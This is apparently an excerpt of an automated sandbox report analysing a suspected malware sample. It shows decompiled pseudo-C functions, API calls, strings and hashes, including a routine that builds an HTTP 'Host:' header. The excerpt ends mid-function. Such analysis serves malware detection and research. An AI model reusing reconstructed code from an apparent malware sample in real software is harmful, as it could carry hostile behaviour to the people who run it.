			E00A9A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00A9AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00a9a7da
0x00a9a7f0
0x00a9a7f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,00A8F1C2,00A8F1C2,0000003C,00000000,?,00A89D55), ref: 00A9A7F0

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 4645ac546a2e5ae069986b041bbe8dc9accd612db9ec172cf48c409fb78e5a27
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 99E01AB52002086BDB10DF49CC85EE737ADAF89750F018155BA0C57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A6A0 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A9A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00A9AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00a9a6a3
0x00a9a6ba
0x00a9a6c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00A9A6C8

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f23230150b95f0a74d0e8b88c8038fdc43dfa9d1d1c015c049d1143357f84b1
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 7AD017766002187BDA20EB98CC85FE777ACDF497A0F0180A5BA1C6B242C531BA008AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0175967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01759694

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd99a5c2e51183ddb1586fd6c3ad0d2cc20fb54e66e944d2a64b31987f2ec5d3
Instruction ID: 3d812c6418611648d39c06edc3f8dd7db4b25b3db32223c1c6e77b2f7a013789
Opcode Fuzzy Hash: bd99a5c2e51183ddb1586fd6c3ad0d2cc20fb54e66e944d2a64b31987f2ec5d3
Instruction Fuzzy Hash: 23B09B719054C5C9E751D7A54608717F944B7D4745F16C061D6420641F4778C095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 017CB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017CB476
The instruction at %p referenced memory at %p., xrefs: 017CB432
Go determine why that thread has not released the critical section., xrefs: 017CB3C5
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 017CB39B
This failed because of error %Ix., xrefs: 017CB446
The instruction at %p tried to %s , xrefs: 017CB4B6
*** enter .exr %p for the exception record, xrefs: 017CB4F1
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017CB323
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017CB53F
a NULL pointer, xrefs: 017CB4E0
an invalid address, %p, xrefs: 017CB4CF
The critical section is owned by thread %p., xrefs: 017CB3B9
*** enter .cxr %p for the context, xrefs: 017CB50D
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017CB305
The resource is owned shared by %d threads, xrefs: 017CB37E
write to, xrefs: 017CB4A6
*** then kb to get the faulting stack, xrefs: 017CB51C
*** An Access Violation occurred in %ws:%s, xrefs: 017CB48F
read from, xrefs: 017CB4AD, 017CB4B2
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017CB47D
The resource is owned exclusively by thread %p, xrefs: 017CB374
*** Inpage error in %ws:%s, xrefs: 017CB418
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017CB38F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017CB314
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017CB2DC
<unknown>, xrefs: 017CB27E, 017CB2D1, 017CB350, 017CB399, 017CB417, 017CB48E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 017CB2F3
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017CB3D6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017CB484
*** Resource timeout (%p) in %ws:%s, xrefs: 017CB352

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 7eed1adbf3954d3ba886fb8d0c4845406c7a0e43233bda50efc658b91673fa67
Instruction ID: 91668504391a10b0ae959f4af06d06917b40db6e8ddd26fb13546ecc571fe58f
Opcode Fuzzy Hash: 7eed1adbf3954d3ba886fb8d0c4845406c7a0e43233bda50efc658b91673fa67
Instruction Fuzzy Hash: 7C81E2B5A00310FFDB266B8ACC5AD7FFF66EF96B91B40408CF5042B156E2618951C672

Uniqueness

Uniqueness Score: -1.00%

Function 00A96CDD Relevance: 7.6, Strings: 6, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00A96CDD(intOrPtr* __eax, void* __eflags) {
				void* _t40;
				void* _t41;
				void* _t52;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t62;

				asm("a16 push esp");
				asm("scasd");
				if(__eflags >= 0) {
					_t41 = _t40 + __eax;
					_t59 = _t58 + 1;
					0x6f14db70();
					 *((intOrPtr*)(_t59 - 0x14)) = 0x6e776f;
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0xcb8))))( *__eax());
					__eflags = _t55;
					if(_t55 != 0) {
						__eflags = _t55 - 0x40;
						if(_t55 > 0x40) {
							 *((char*)(_t41 + 0xda7)) = 0;
							_t55 = 0x40;
						}
					} else {
						_t3 = _t59 - 0x18; // 0x6e6b6e55
						E00A9BDD0(_t41 + 0xd68, _t3, 8);
						_t62 = _t62 + 0xc;
						_t55 = 7;
					}
					 *((intOrPtr*)(_t59 - 8)) = 0xa0d0a0d;
					 *((char*)(_t59 - 4)) = 0;
					 *((intOrPtr*)(_t59 - 0x10)) = 0x74736f48;
					 *((short*)(_t59 - 0xc)) = 0x203a;
					 *((char*)(_t59 - 0xa)) = 0;
					E00A9BDD0(_t52, _t59 - 0x10, 7);
					E00A9BDD0(_t52 + 6, _t41 + 0xd68, _t55);
					_t14 = _t59 - 8; // 0xa0d0a0d
					 *((char*)(_t55 + _t52 + 6)) = 0;
					E00A9C1D0(_t52, _t14, 5);
					_t17 = _t59 + 0x10; // 0x74736f48
					_t18 = _t59 + 0xc; // 0x203a
					_t20 = _t52 + 0xa; // 0x11
					E00A9BDD0(_t55 + _t20,  *_t18,  *_t17);
					_t22 = _t59 + 0x10; // 0x74736f48
					_t47 =  *_t22;
					_push( *((intOrPtr*)(_t41 + 0x1160)));
					_push(2);
					_t24 = _t47 + 0xa; // 0x11
					_push(_t55 + _t24);
					_push(_t52);
					_push(_t41);
					L00A963E0( *_t22, _t55 + _t24);
					return 1;
				} else {
					return __eax;
				}
			}

0x00a96cdd
0x00a96cdf
0x00a96ce0
0x00a96d13
0x00a96d15
0x00a96d16
0x00a96d1b
0x00a96d2d
0x00a96d2f
0x00a96d31
0x00a96d4f
0x00a96d52
0x00a96d54
0x00a96d5b
0x00a96d5b
0x00a96d33
0x00a96d35
0x00a96d40
0x00a96d45
0x00a96d48
0x00a96d48
0x00a96d67
0x00a96d6e
0x00a96d72
0x00a96d79
0x00a96d7f
0x00a96d83
0x00a96d94
0x00a96d9b
0x00a96da0
0x00a96da5
0x00a96daa
0x00a96dad
0x00a96db2
0x00a96db7
0x00a96dc2
0x00a96dc2
0x00a96dc5
0x00a96dc6
0x00a96dc8
0x00a96dcc
0x00a96dcd
0x00a96dce
0x00a96dcf
0x00a96de2
0x00a96ce6
0x00a96cec
0x00a96cec

Strings

: , xrefs: 00A96DAD, 00A96DB1
: , xrefs: 00A96D79
Host: , xrefs: 00A96DAA, 00A96DC2, 00A96DB0
Host, xrefs: 00A96D72
, xrefs: 00A96D9B, 00A96D9E
Unknown, xrefs: 00A96D35, 00A96D38

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID: $: $: $Host$Host: $Unknown
API String ID: 0-3527920956
Opcode ID: ad8ed4a618d958df6adef819aefc5dc5dea006b374e12be4555140abdbf665dd
Instruction ID: 5140540794cbd2086a94f669d239ad54a7e53cba0ef6de904d1ed42398c3a434
Opcode Fuzzy Hash: ad8ed4a618d958df6adef819aefc5dc5dea006b374e12be4555140abdbf665dd
Instruction Fuzzy Hash: 4821AF76A00208AADB11DB94DC81BEFB3A8AFC4700F048659F9199B245C775A604C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 01723D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01723D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01721B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01721B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01721B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01721B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01721B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01734620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0175F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01761370(_t276, 0x16f4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0175BB40(0,  &_v68, _t170);
									if(L017243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0175BB40(_t257,  &_v68, _t243);
								if(L017243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01761370(_t278, 0x16f4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01734620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0175F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01761370(_v16, 0x16f4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0175BB40(_t262,  &_v68, _t244);
								if(L017243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01761370(_t282, 0x16f4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0175BB40(_t262,  &_v68, _t201);
							if(L017243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01734620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0175F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01761370(_t280, 0x16f4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0175BB40(_t267,  &_v68, _t245);
							if(L017243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01761370(_t284, 0x16f4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0175BB40(_t267,  &_v68, _t224);
						if(L017243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01723d3c
0x01723d42
0x01723d44
0x01723d46
0x01723d49
0x01723d4c
0x01723d4f
0x01723d52
0x01723d55
0x01723d58
0x01723d5b
0x01723d5f
0x01723d61
0x01723d66
0x01778213
0x01778218
0x01724085
0x01724088
0x0172408e
0x01724094
0x0172409a
0x017240a0
0x017240a6
0x017240a9
0x017240af
0x017240b6
0x017240bd
0x017240bd
0x01723d83
0x0177821f
0x01778229
0x01778238
0x01778238
0x0177823d
0x0177823d
0x01723da0
0x01723daf
0x01723db5
0x01723dba
0x01723dba
0x01723dd4
0x01723e94
0x01723eab
0x01723f6d
0x01723f84
0x0172406b
0x0172406b
0x0172406e
0x0172406e
0x01724070
0x01724074
0x01778351
0x01778351
0x0172407a
0x0172407f
0x0177835d
0x01778370
0x01778377
0x01778379
0x0177837c
0x0177837c
0x0177835d
0x00000000
0x0172407f
0x01723f8a
0x01723f8d
0x01723f90
0x01723f95
0x0177830d
0x0177830f
0x01723f9b
0x01723fac
0x01723fae
0x01723fb1
0x01723fb1
0x01723fb6
0x01778317
0x0177831a
0x00000000
0x01723fbc
0x01723fc1
0x01723fc9
0x01723fd7
0x01723fda
0x01723fdd
0x01724021
0x01724021
0x01724029
0x01724030
0x01724044
0x01724046
0x01724046
0x01724044
0x01724049
0x01778327
0x01778334
0x01778339
0x0177833c
0x0172404f
0x0172404f
0x0172404f
0x01724051
0x01724056
0x01724063
0x01724063
0x01724068
0x00000000
0x01724068
0x01723fdf
0x01723fe2
0x01723fe4
0x01723fe7
0x01723fef
0x01724003
0x01724005
0x01724005
0x0172400c
0x01724013
0x01724016
0x01724017
0x0172401b
0x0172401e
0x00000000
0x0172401e
0x01723fb6
0x01723eb1
0x01723eb4
0x01723eb7
0x01723ebc
0x017782a9
0x017782ab
0x01723ec2
0x01723ed3
0x01723ed5
0x01723ed8
0x01723ed8
0x01723edd
0x017782b3
0x017782b6
0x00000000
0x01723ee3
0x01723ee8
0x01723eed
0x01723ef0
0x01723ef3
0x01723f02
0x01723f05
0x01723f08
0x017782c0
0x017782c3
0x017782c5
0x017782c8
0x017782d0
0x017782e4
0x017782e6
0x017782e6
0x017782ed
0x017782f4
0x017782f7
0x017782f8
0x017782fc
0x017782ff
0x017782ff
0x01723f0e
0x01723f11
0x01723f16
0x01723f1d
0x01723f31
0x01778307
0x01778307
0x01723f31
0x01723f39
0x01723f48
0x01723f4d
0x01723f50
0x01723f50
0x01723f53
0x01723f58
0x01723f65
0x01723f65
0x01723f6a
0x00000000
0x01723f6a
0x01723edd
0x01723dda
0x01723ddd
0x01723de0
0x01723de5
0x01778245
0x01723deb
0x01723df7
0x01723dfc
0x01723dfe
0x01723e01
0x01723e01
0x01723e06
0x0177824d
0x0177824f
0x01778254
0x00000000
0x01723e0c
0x01723e11
0x01723e16
0x01723e19
0x01723e29
0x01723e2c
0x01723e2f
0x0177825c
0x0177825f
0x01778261
0x01778264
0x0177826c
0x01778280
0x01778282
0x01778282
0x01778289
0x01778290
0x01778293
0x01778294
0x01778298
0x0177829b
0x0177829b
0x01723e35
0x01723e38
0x01723e3d
0x01723e44
0x01723e58
0x017782a3
0x017782a3
0x01723e58
0x01723e60
0x01723e6f
0x01723e74
0x01723e77
0x01723e77
0x01723e7a
0x01723e7f
0x01723e8c
0x01723e8c
0x01723e91
0x00000000
0x01723e91

Strings

Kernel-MUI-Language-SKU, xrefs: 01723F70
Kernel-MUI-Language-Allowed, xrefs: 01723DC0
Kernel-MUI-Language-Disallowed, xrefs: 01723E97
WindowsExcludedProcs, xrefs: 01723D6F
Kernel-MUI-Number-Allowed, xrefs: 01723D8C

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 6453d8cd1d5af1a213d5a1823e8ad9c0d9c4bc945ac7d347679fbfab909a0037
Instruction ID: b1e955fef0aa3b4febfffcae58cedf964b626ffcbe21f02dd938d55f04e45655
Opcode Fuzzy Hash: 6453d8cd1d5af1a213d5a1823e8ad9c0d9c4bc945ac7d347679fbfab909a0037
Instruction Fuzzy Hash: FEF14C72D00629EFCF11DF98C984AEEFBB9FF48650F15006AE905A7215E7749E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 017DE539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E017DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E017DBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							L017DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							L017DAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(L01759730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E017DA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E017DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(L01759730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E017DA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E017DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01732280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0172B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									L0172FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01737D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									L017CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
